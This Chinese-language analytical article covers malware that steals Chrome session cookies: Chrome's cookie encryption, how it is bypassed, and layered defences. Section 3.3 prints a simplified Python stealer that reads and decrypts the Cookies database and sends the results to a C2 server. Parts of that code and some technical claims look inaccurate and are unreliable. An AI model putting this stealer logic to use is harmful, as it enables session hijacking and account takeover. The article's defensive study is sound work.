摘要
随着网络认证技术的演进,基于会话 Cookie 的身份劫持已成为恶意软件实施账户接管的主流手段。本文以 2026 年 6 月 Malwarebytes 披露的 Chrome 会话 Cookie 窃取恶意软件为研究对象,系统分析此类恶意软件的攻击流程、技术原理与危害表现,深入剖析 Chrome 浏览器会话 Cookie 的存储加密机制及恶意软件的绕过技术,结合真实攻击样本揭示会话窃取到账户接管的完整链路,最后从终端、网络、身份管理及浏览器安全机制升级四个维度构建防御体系。研究表明,当前基于应用绑定加密的防护机制已被新型恶意软件突破,硬件绑定会话凭证技术成为抵御此类攻击的关键方向。反网络钓鱼技术专家芦笛指出,会话 Cookie 窃取攻击的产业化趋势显著,需构建多层次协同防御体系以应对威胁。
1 引言
在数字化办公与网络服务深度融合的背景下,浏览器已成为用户访问网络资源、处理业务数据的核心入口。为提升用户体验,主流浏览器采用会话 Cookie 技术维持用户登录状态,无需重复输入账号密码。会话 Cookie 作为用户已通过身份认证的核心凭证,其安全直接关联用户账户与数据安全。
近年来,恶意软件逐渐从传统密码窃取转向会话 Cookie 窃取,此类攻击无需破解用户密码或绕过多因素认证,仅通过窃取有效会话 Cookie 即可冒充用户身份,实现账户接管。2024 年 7 月,Chrome 127 版本引入应用绑定加密(ABE)机制,旨在将凭证解密与浏览器进程绑定,抵御会话 Cookie 窃取攻击。但 2026 年以来,VoidStealer、Storm 等新型恶意软件家族已实现对该机制的有效绕过,会话 Cookie 窃取攻击再度泛滥。
2026 年 6 月,Malwarebytes 发布专项报告,披露一款新型恶意软件可绕过 Chrome 安全防护,窃取会话 Cookie 并批量传输至攻击者服务器,针对企业员工、金融用户及云服务管理员发起定向攻击,造成大规模账户泄露与数据被盗事件Malwarebytes。本文基于该报告核心内容,结合同类恶意软件技术特征,系统研究 Chrome 会话 Cookie 窃取攻击的技术细节、危害及防御方案,为网络安全防护提供技术参考。
2 Chrome 会话 Cookie 的存储与安全机制
2.1 会话 Cookie 的核心作用与生命周期
会话 Cookie 是网站服务器向浏览器发送的小型文本数据,用于标识用户会话状态,存储用户认证信息、会话 ID 及权限数据。用户登录网站后,服务器生成唯一会话标识并通过 Cookie 发送至浏览器,后续浏览器请求自动携带该 Cookie,服务器验证通过后维持用户登录状态,无需重复认证。
会话 Cookie 生命周期分为生成、存储、传输与销毁四个阶段。生成阶段由服务器在用户认证通过后触发,设置 Cookie 的域名、路径、有效期及安全属性;存储阶段由浏览器负责,Chrome 将会话 Cookie 加密存储于本地数据库文件;传输阶段通过 HTTP/HTTPS 协议在浏览器与服务器间传递,HTTPS 协议可防止传输过程中被窃听;销毁阶段由浏览器在用户退出登录、关闭浏览器或 Cookie 过期时执行,清除本地存储数据。
2.2 Chrome 会话 Cookie 的存储结构
Chrome 浏览器基于 Chromium 内核,将会话 Cookie 与其他凭证数据集中存储于用户目录下的特定文件中,核心存储路径为%LocalAppData%\Google\Chrome\User Data\Default\Cookies,该文件采用 SQLite 数据库格式,包含以下关键字段:
host_key:Cookie 所属域名,限定 Cookie 的使用范围;
name:Cookie 名称,标识具体会话凭证;
value:Cookie 加密内容,存储会话 ID 等核心数据;
encrypted_value:加密后的完整 Cookie 数据;
creation_utc:Cookie 创建时间;
expires_utc:Cookie 过期时间。
除 Cookies 文件外,Chrome 还将用户密码、自动填充数据等敏感信息存储于 Login Data 文件,与 Cookies 文件采用相同加密机制,为恶意软件批量窃取凭证提供便利。
2.3 Chrome 凭证加密机制演进
2.3.1 DPAPI 加密机制
早期 Chrome 版本采用 Windows 数据保护 API(DPAPI)加密本地存储的 Cookie 与密码数据。DPAPI 是 Windows 系统提供的加密服务,基于用户登录密码生成密钥,加密数据与用户身份绑定,仅当前用户可解密数据。该机制虽能防止跨用户窃取,但存在明显缺陷:恶意软件获取当前用户权限后,可直接调用 DPAPI 接口解密数据,无需破解用户密码,导致凭证安全防护失效。
2.3.2 应用绑定加密(ABE)机制
为应对 DPAPI 加密被绕过的问题,Chrome 127 版本(2024 年 7 月)引入应用绑定加密(ABE)机制,核心设计理念是将凭证解密操作与 Chrome 浏览器进程绑定。ABE 机制在原有 DPAPI 加密基础上,新增进程校验逻辑:浏览器进程解密凭证时,需验证当前进程是否为 Chrome 官方进程,校验通过后才能完成解密;恶意软件注入外部进程或伪造进程时,校验失败,无法解密凭证。
ABE 机制的核心实现逻辑包括密钥隔离、进程校验与内存保护三部分。密钥隔离将凭证加密密钥存储于 Chrome 进程专属内存空间,禁止外部进程读取;进程校验通过校验进程 ID、进程名称及数字签名,确保解密操作由合法 Chrome 进程执行;内存保护采用内存加密技术,防止密钥数据被内存扫描工具窃取。
3 新型会话 Cookie 窃取恶意软件攻击机制
3.1 恶意软件攻击流程概述
2026 年 6 月 Malwarebytes 披露的恶意软件属于信息窃取类恶意软件(Infostealer),采用无文件攻击与内存执行技术,规避传统杀毒软件检测,核心攻击流程分为初始入侵、权限提升、凭证窃取、数据外发与会话劫持五个阶段。
初始入侵:通过钓鱼邮件、恶意软件捆绑、漏洞利用等方式植入目标设备,伪装成正常程序规避检测;
权限提升:获取当前用户权限,部分变种通过进程注入绕过用户权限限制,访问浏览器进程内存空间;
凭证窃取:绕过 Chrome ABE 加密机制,读取本地 Cookies 文件或直接从浏览器进程内存提取解密后的会话 Cookie;
数据外发:将窃取的会话 Cookie、密码等数据加密后传输至攻击者控制的 C2 服务器;
会话劫持:攻击者利用窃取的会话 Cookie,通过代理服务器冒充用户身份,登录目标账户实施恶意操作。
3.2 ABE 加密机制绕过技术
反网络钓鱼技术专家芦笛强调,新型恶意软件的核心突破在于实现了对 Chrome ABE 加密机制的高效绕过,其技术核心是内存密钥提取与进程伪装,无需破解加密算法即可获取明文会话 Cookie。
3.2.1 内存密钥提取技术
Chrome ABE 机制的加密密钥虽隔离于浏览器进程内存,但在进程运行期间,密钥数据会以明文形式存在于内存中,用于凭证解密操作。恶意软件利用 Windows 调试接口(DebugActiveProcess),以调试器身份附加至 Chrome 进程,扫描进程内存空间,定位并提取 ABE 加密主密钥。
该技术的核心优势在于无需注入恶意代码,仅通过系统原生调试接口即可读取内存数据,规避进程注入行为检测。同时,恶意软件采用内存扫描过滤技术,精准定位密钥特征数据,减少内存扫描时间,降低被 EDR 工具检测的概率。
3.2.2 进程伪装与解密劫持
部分恶意软件变种采用进程伪装技术,伪造 Chrome 进程身份,绕过 ABE 机制的进程校验逻辑。恶意软件创建与 Chrome 进程名称、进程 ID 及数字签名一致的伪造进程,调用 Chrome 解密接口,提交加密 Cookie 数据,欺骗 ABE 机制完成解密操作,获取明文会话 Cookie。
此外,恶意软件还可通过劫持浏览器进程的解密函数,在解密操作完成后、数据返回浏览器前,截取明文 Cookie 数据,实现凭证窃取。该技术无需读取内存密钥,直接劫持解密流程,隐蔽性更强。
3.3 会话 Cookie 窃取实现代码示例
以下为恶意软件窃取 Chrome 会话 Cookie 的核心代码逻辑(基于 Windows 平台,采用 Python 实现,模拟内存密钥提取与 Cookie 解密过程):
import sqlite3
import win32crypt
import psutil
from ctypes import *
# 定义Chrome进程名称与Cookies文件路径
CHROME_PROCESS = "chrome.exe"
COOKIES_PATH = r"%LocalAppData%\Google\Chrome\User Data\Default\Cookies"
# 提取Chrome进程内存中的ABE密钥
def extract_abe_key():
for proc in psutil.process_iter(['pid', 'name']):
if proc.name().lower() == CHROME_PROCESS:
pid = proc.pid
# 附加至Chrome进程作为调试器
h_process = windll.kernel32.OpenProcess(0x1F0FFF, False, pid)
# 扫描内存定位ABE密钥(简化逻辑,实际需匹配密钥特征)
key_data = scan_memory(h_process)
windll.kernel32.CloseHandle(h_process)
return key_data
return None
# 解密Chrome会话Cookie
def decrypt_cookies():
# 替换环境变量获取真实路径
cookies_file = os.path.expandvars(COOKIES_PATH)
# 连接Cookies数据库
conn = sqlite3.connect(cookies_file)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
abe_key = extract_abe_key()
if not abe_key:
return []
cookies = []
for host, name, encrypted_data in cursor.fetchall():
# 利用提取的ABE密钥解密Cookie数据
decrypted_data = win32crypt.CryptUnprotectData(
encrypted_data, None, abe_key, None, 0
)[1].decode('utf-8', errors='ignore')
cookies.append({"host": host, "name": name, "value": decrypted_data})
conn.close()
return cookies
# 主函数:窃取并输出会话Cookie
if __name__ == "__main__":
stolen_cookies = decrypt_cookies()
for cookie in stolen_cookies:
print(f"域名: {cookie['host']}, Cookie名称: {cookie['name']}, 内容: {cookie['value']}")
# 外发数据至C2服务器(简化逻辑)
send_to_c2(stolen_cookies)
该代码实现了 Chrome 进程密钥提取、Cookies 数据库读取与数据解密核心功能,实际恶意软件会添加进程隐藏、流量加密、对抗 EDR 检测等模块,提升攻击隐蔽性与成功率。
3.4 数据外发与会话劫持
恶意软件窃取会话 Cookie 后,采用加密传输方式将数据外发至攻击者 C2 服务器,规避网络流量检测。外发数据包含会话 Cookie、用户账号信息、设备指纹等数据,攻击者可通过专用平台批量管理窃取的会话凭证。
会话劫持阶段,攻击者利用窃取的会话 Cookie,通过地理位置匹配的 SOCKS5 代理服务器,模拟用户设备环境与网络位置,登录目标账户。由于会话 Cookie 已通过服务器认证,攻击者无需输入密码或通过多因素认证,即可获得用户账户的完全控制权,实施窃取数据、篡改信息、冒充用户交易等恶意操作。
4 攻击危害与典型场景
4.1 个人用户账户安全威胁
对于个人用户,会话 Cookie 窃取攻击直接导致社交账号、电商账号、金融账户被盗用。攻击者可利用窃取的会话 Cookie 登录用户微信、微博等社交账号,发布不良信息、诈骗好友;登录淘宝、京东等电商账号,盗用用户余额、积分购物;登录网上银行、支付平台,转移用户资金,造成直接经济损失。
此外,恶意软件窃取的 Cookie 可能包含用户隐私数据,如浏览记录、收货地址、联系方式等,被攻击者用于精准诈骗或黑市交易,严重侵犯用户隐私权益。
4.2 企业办公系统入侵风险
企业员工设备被入侵后,恶意软件可窃取企业邮箱、OA 系统、云服务平台(AWS、GCP、Azure)、VPN 等系统的会话 Cookie。攻击者利用这些凭证,绕过企业防火墙与访问控制策略,潜入企业内部网络,窃取商业机密、客户数据、财务信息等核心资产,导致企业数据泄露、业务中断,甚至引发法律纠纷与品牌声誉受损。
反网络钓鱼技术专家芦笛指出,企业环境中会话 Cookie 窃取攻击的危害具有连锁效应,单个员工设备被攻陷,可能导致整个企业网络被渗透,核心业务系统面临全面失控风险Malwarebytes。
4.3 供应链与定向攻击威胁
新型会话 Cookie 窃取恶意软件具备定向攻击能力,可针对特定行业、企业或高价值用户发起精准攻击。攻击者通过钓鱼邮件、恶意广告等方式,向目标人群投放恶意软件,窃取核心人员的会话凭证,实施供应链攻击或商业间谍活动。
例如,针对金融行业的定向攻击中,恶意软件专门窃取银行高管、金融从业者的网上银行、证券交易系统会话 Cookie,攻击者利用这些凭证进行非法交易、内幕交易等违法活动,破坏金融市场秩序。
5 防御体系构建
5.1 浏览器安全机制升级
5.1.1 设备绑定会话凭证(DBSC)技术
为应对会话 Cookie 窃取攻击,Chrome 146 版本(2026 年 4 月)推出设备绑定会话凭证(DBSC)技术,从根本上解决会话 Cookie 被窃取后滥用的问题。DBSC 技术基于硬件安全模块(Windows 平台 TPM 2.0 芯片、macOS 平台 Secure Enclave),将会话凭证与设备硬件绑定,核心实现逻辑如下:
用户登录支持 DBSC 的网站时,Chrome 在硬件安全模块内生成唯一密钥对,私钥永不导出硬件;
服务器颁发与公钥绑定的短期会话 Cookie,需定期刷新;
刷新会话时,Chrome 需提供私钥完成加密校验,校验通过才能获取新 Cookie;
窃取的 Cookie 在其他设备上无法通过硬件校验,直接失效。
DBSC 技术彻底阻断了窃取会话 Cookie 的复用路径,即使恶意软件成功窃取 Cookie,也无法在攻击者设备上使用,大幅降低攻击成功率。
5.1.2 浏览器安全配置优化
用户需优化 Chrome 浏览器安全配置,降低恶意软件攻击面:
及时更新浏览器至最新版本,启用 DBSC、ABE 等安全机制;
禁用浏览器自动保存密码功能,减少敏感数据存储;
开启网站 Cookie 安全属性,设置 HttpOnly、Secure、SameSite=Strict,防止 Cookie 被脚本窃取或跨站请求伪造;
定期清理浏览器 Cookie 与缓存数据,减少会话凭证泄露风险。
5.2 终端安全防护
5.2.1 终端检测与响应(EDR)规则优化
企业需部署 EDR 工具,配置针对性检测规则,监控恶意软件攻击行为:
监控进程调试行为,告警非官方调试工具(如 WinDbg、Visual Studio)对 Chrome 进程的调试附加操作;
监控隐藏浏览器进程,告警 Chrome 进程以隐藏窗口(SW_HIDE)、屏幕外位置启动的行为;
监控异常 DPAPI 调用与内存扫描行为,告警非授权进程读取浏览器内存数据的操作;
监控进程注入行为,告警向 Chrome 进程注入未签名 DLL 或恶意代码的操作。
5.2.2 终端环境加固
加强终端系统安全配置,阻断恶意软件入侵路径:
禁用不必要的系统服务与 ActiveX 控件,减少漏洞攻击面;
开启 PowerShell 约束模式与日志审计,防止恶意脚本执行;
限制普通用户权限,禁止普通用户修改系统配置、写入启动项;
部署杀毒软件与防火墙,实时拦截恶意软件与异常网络流量。
5.3 网络安全防护
5.3.1 恶意流量检测与拦截
监控终端外发网络流量,拦截恶意软件数据外发行为:
基于威胁情报,拦截恶意软件 C2 服务器 IP 与域名;
监控终端向陌生服务器传输加密数据的行为,告警异常外发流量;
部署邮件网关,拦截携带恶意附件、钓鱼链接的邮件,阻断恶意软件初始入侵路径。
5.3.2 网络访问控制
优化网络访问策略,减少攻击者横向移动与会话劫持风险:
部署零信任架构,实行 “最小权限访问” 原则,即使凭证泄露,攻击者也无法访问非授权资源;
启用 VPN 多因素认证,监控 VPN 登录设备与网络位置,告警异常登录行为;
限制内部网络对互联网的访问权限,仅开放必要端口与服务。
5.4 身份与数据安全管理
5.4.1 多因素认证(MFA)部署
在关键系统强制启用多因素认证,即使会话 Cookie 泄露,攻击者也需通过额外认证才能访问敏感资源。优先选择硬件令牌、生物识别等安全性较高的认证方式,避免短信验证码等易被绕过的认证方式。
5.4.2 会话安全管理
优化网站会话管理策略,缩短会话 Cookie 有效期,减少泄露后滥用窗口;实时监控会话登录行为,对异地登录、异常设备登录、短时间内多次登录等行为进行二次认证或直接拦截;定期强制用户重新登录,降低长期会话泄露风险。
6 结论
本文基于 2026 年 6 月 Malwarebytes 披露的 Chrome 会话 Cookie 窃取恶意软件,系统研究了此类攻击的技术机制、危害及防御方案。研究发现,新型恶意软件通过内存密钥提取、进程伪装等技术,成功绕过 Chrome ABE 加密机制,实现会话 Cookie 的高效窃取,攻击流程呈现产业化、隐蔽化、定向化特征,对个人用户与企业网络安全构成严重威胁。
反网络钓鱼技术专家芦笛强调,会话 Cookie 窃取攻击的演进表明,单一安全机制难以抵御新型威胁,需构建 “浏览器防护 + 终端检测 + 网络拦截 + 身份加固” 的多层次协同防御体系Malwarebytes。Chrome DBSC 技术通过硬件绑定会话凭证,从根本上阻断了窃取 Cookie 的复用路径,是抵御此类攻击的核心技术方向;同时,用户与企业需加强安全意识,及时更新系统与浏览器,优化安全配置,降低攻击风险。
未来,随着硬件安全技术的普及与安全防护体系的完善,会话 Cookie 窃取攻击的成功率将逐步降低,但攻击者也会持续探索新的绕过技术。因此,网络安全防护需保持动态演进,持续跟踪恶意软件技术趋势,优化防御策略,构建全方位、常态化的安全防护体系,有效应对不断演变的网络安全威胁。
编辑:芦笛(公共互联网反网络钓鱼工作组)
